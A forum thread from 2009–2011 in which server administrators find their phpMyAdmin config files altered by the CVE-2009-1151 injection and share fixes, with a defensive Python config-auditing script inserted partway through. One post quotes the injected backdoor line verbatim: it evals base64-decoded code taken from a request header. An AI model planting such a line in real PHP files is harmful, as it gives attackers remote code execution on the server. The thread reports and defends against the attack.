Can't login to phpmyadmin (possibly related to a phpMyAdmin vulnerability)


voidzero
13th June 2009, 21:17
Hi,

For some reason my server crashed. When I brought it back up I found no real problems or inconsistencies, but when I tried to visit phpmyadmin I get:

1045 - Access denied for user 'root'@'localhost' (using password: NO)
Invalid hostname for server 1. Please review your configuration.

Any way to solve this?

voidzero
13th June 2009, 22:24
By the way, this shows every time, I can't even try to login, it happens as soon as I open phpmyadmin.

till
14th June 2009, 11:31
Make sure that you close all browser windows and then open the browser again before you connect to phpmyadmin.

manarak
16th June 2009, 20:53
I have exactly the same problem.

It appeared out of nowhere, maybe after I did an update.

I tried what you suggested, but it seems clear that this is a server problem.

voidzero
16th June 2009, 21:00
Exactly, manarak!

Anyway, what I did as a workaround was:


Edit /var/lib/phpmyadmin/config.inc.php;
Change the option value 'config' to 'cookie'.


I'm still getting the error "Invalid hostname for server 1. Please review your configuration." but at least I can login again.

manarak
16th June 2009, 21:05
cool, thanks - it would still be interesting to find out what broke phpmyadmin though.

manarak
16th June 2009, 22:57
OK, it looks like the config file was changed: the hostname is commented out and there is a phpinfo(); in its place.

That could be an injection attack?

Is there a known vulnerability?

till
16th June 2009, 23:00
is there a known vulnerability?

Which software do you mean? ISPConfig or phpmyadmin? In ISPConfig there are no known vulnerabilities.

Which config file was changed?

manarak
16th June 2009, 23:01
yes there is:

http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/

we have been injected !!

till
16th June 2009, 23:03
Make sure that you install all available Debian updates. phpmyadmin is part of Debian and not part of ISPConfig.

manarak
16th June 2009, 23:04
my server has always been updated less than 12 hours after new versions were out.

it is just frightening!!

Two weeks ago I was infected with very nasty trojans on the PC in spite of an up-to-date antivirus.

then there are those nasty hidden iframe viruses out...


the internet has become VERY DANGEROUS in the last months!

till
16th June 2009, 23:06
OK, then it might be that there is no patch available for this vulnerability from Debian yet. Sad, but it might always happen. Scan your system with rkhunter and chkrootkit and check if there are any other modifications. Also, you should consider deactivating phpmyadmin temporarily.

manarak
16th June 2009, 23:38
if I chmod the config file to 440, that should stop the attack, no?

till
17th June 2009, 10:00
It's at least worth a try.

manarak
17th June 2009, 10:05
could you please change the thread topic and add [phpMyAdmin vulnerability] in front of it?

till
17th June 2009, 10:09
I changed the topic, but that's the problem if you post to other threads instead of making a new one. The original poster had a login problem with phpmyadmin and this does not necessarily mean that his system had been hacked like yours.

manarak
17th June 2009, 10:16
the probability that he has been injected like me is 99%

the injection does modify the hostname entry in the config file, and his problem appeared out of nowhere in the last days...
Now how big a coincidence is that??

peterspoon
20th June 2009, 14:18
Same issue here. Debian Lenny, last updates. Config file has been modified! Looks serious!!!

manarak
20th June 2009, 14:24
read the description of the vulnerability: "arbitrary code execution"
need I say more?

till
20th June 2009, 14:40
If debian does not release a bugfix for that, you should either remove phpmyadmin or protect it with a .htaccess file or install your own copy from sources without using the debian package.

manarak
20th June 2009, 15:45
Due to the nature of the attack, I think chown to root and chmod to 444 will do the trick. What do you think?

edge
22nd June 2009, 12:24
Looks like they got me also.
I was away for a small trip (no internet access), and they got me :-(

Nicke
22nd June 2009, 19:39
Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit.

If you want to feel more secure.. you can do this:

nano /usr/share/phpmyadmin/.htaccess

Paste:
<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>

and save.

Try to access your file:
http://www.yourdomain/phpmyadmin/config.inc.php

White page = Not ok.
403 Forbidden = Great! ;)

edge
22nd June 2009, 20:26
I did already add the .htaccess to it today, but now I also deleted the /scripts dir.

How should the line $cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost'; in /var/lib/phpmyadmin/config.inc.php look?
The phpinfo(); part does not look correct!

till
22nd June 2009, 20:27
Should be:

$cfg['Servers'][$i]['host']= 'localhost';

edge
22nd June 2009, 20:33
And one more..

The line:
$cfg['Servers'][$i]['auth_type'] = 'config'
I can only get it to work when set to cookie

voidzero
22nd June 2009, 20:46
My line has been changed for some reason. It now reads:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';

Whatta heck??

I lost my original config file now. How could I get it back?

voidzero
22nd June 2009, 20:52
By the way, the only valid line in /var/lib/phpmyadmin/config.inc.php is now:
$i = 0;

And phpmyadmin works without problems again.
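
An added example, not part of the thread: a strict allowlist check for a phpMyAdmin config.inc.php, where every line must be a comment, the `$i` counter, or a plain `$cfg[...] = literal;` assignment, so tampered lines like the two quoted in the posts above are reported. The function name `audit`, the accepted grammar and the sample file are assumptions made for this illustration.

```python
import re

# Accepted grammar (an assumption of this sketch, deliberately strict):
#   $cfg['Key'][$i]['sub'] = 'literal' | 123 | true | false | null;
KEY = r"(?:\[(?:'[\w.-]+'|\$i|\d+)\])+"
VALUE = r"(?:'[^'\\]*'|\d+|true|false|null)"
ASSIGN = re.compile(rf"^\$cfg{KEY}\s*=\s*{VALUE};\s*$", re.I)
COUNTER = re.compile(r"^\$i\s*(?:=\s*\d+|\+\+);\s*$")

# Constructed sample: clean settings plus the two tampered lines from the thread.
SAMPLE = r"""<?php
/* Servers configuration */
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';
$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';
?>
"""

def audit(text):
    """Return (line_number, line) for every line outside the allowlist."""
    findings, in_block = [], False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if in_block:                          # inside a /* ... */ comment
            end = line.find("*/")
            if end < 0:
                continue
            in_block, line = False, line[end + 2:].strip()
        if line.startswith("/*"):
            end = line.find("*/", 2)
            if end < 0:
                in_block = True
                continue
            line = line[end + 2:].strip()     # code after */ is still checked
        # "?>" ends PHP mode even inside a // or # comment, so such a
        # comment line is not trusted.
        if line.startswith(("//", "#")) and "?>" not in line:
            continue
        if not line or line in ("<?php", "?>"):
            continue
        if ASSIGN.match(line) or COUNTER.match(line):
            continue
        findings.append((n, raw))
    return findings

if __name__ == "__main__":
    for n, raw in audit(SAMPLE):
        print(f"line {n}: unexpected content: {raw}")
```

A legitimate setting written in a form outside this grammar (an array value, a double-quoted string) is also reported, which is the intended trade-off for an integrity check.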

kaschig
25th June 2009, 23:41
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534618

till
26th June 2009, 15:08
Today debian released an update for phpmyadmin.

H2SO4
26th June 2009, 17:55
Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit.

If you want to feel more secure.. you can do this:

nano /usr/share/phpmyadmin/.htaccess

Paste:
<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>

and save.

Try to access your file:
http://www.yourdomain/phpmyadmin/config.inc.php

White page = Not ok.
403 Forbidden = Great! ;)

Today debian released an update for phpmyadmin.

The /usr/share/phpmyadmin/scripts directory was recreated after the update.
The .htaccess in /usr/share/phpmyadmin/ is not working for me, I got a white page only.
I edited /etc/phpmyadmin/apache.conf and now I get 403 Forbidden.

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
Options Indexes FollowSymLinks
DirectoryIndex index.php

<Files config.inc.php>
Order allow,deny
Deny from all
</Files>

# Authorize for setup
<Files setup.php>
Order allow,deny
Deny from all
# For Apache 1.3 and 2.0
<IfModule mod_auth.c>
AuthType Basic
AuthName "phpMyAdmin Setup"
AuthUserFile /etc/phpmyadmin/htpasswd.setup
</IfModule>
# For Apache 2.2
<IfModule mod_authn_file.c>
AuthType Basic
AuthName "phpMyAdmin Setup"
AuthUserFile /etc/phpmyadmin/htpasswd.setup
</IfModule>
Require valid-user
</Files>
<IfModule mod_php4.c>
AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_value include_path .
</IfModule>
<IfModule mod_php5.c>
AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_value include_path .
</IfModule>
</Directory>

Need to reload or restart Apache after the edit:
/etc/init.d/apache2 reload

or

/etc/init.d/apache2 restart

tom
28th June 2009, 11:25
sorry, wrong post ..

juan_g
27th September 2010, 04:16
I also had that error "1045 - Access denied for user" when trying to login to phpMyAdmin after modifying a database username through ISPConfig.

In my case, it wasn't that past phpMyAdmin vulnerability, and simply deleting cookies solved it.

Anyhow, it's advisable to follow this howto or similar: Protect phpMyAdmin On An ISPConfig 3 Server (Debian) (http://howtoforge.net/protect-phpmyadmin-on-an-ispconfig-3-server-debian)

Bashewa
19th February 2011, 22:01
Hi, I've installed ISPconfig3 on Debian Squeeze on a dedicated server with 3 available IPs and everything works fine except for phpmyadmin.

When I create a database I can access phpmyadmin from the ISPconfig panel by clicking the connection to phpmyadmin from the sites/database interface, but I cannot login with the username and password I just set up.


I can login to mysql server from command line by doing

mysql -u root -p

so mysql server is running.
Any ideas how to start fault tracing?

falko
21st February 2011, 00:24
Are there any errors in Apache's error log?

Bashewa
21st February 2011, 00:59
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#


If I run

show databases; from mysql command line logged in via SSH

I can see the databases that I make in ISPconf3 panel.

falko
21st February 2011, 16:03
Does your MySQL password contain any special characters?

Bashewa
22nd February 2011, 01:58
No, only letters and 3 numbers: all lower case.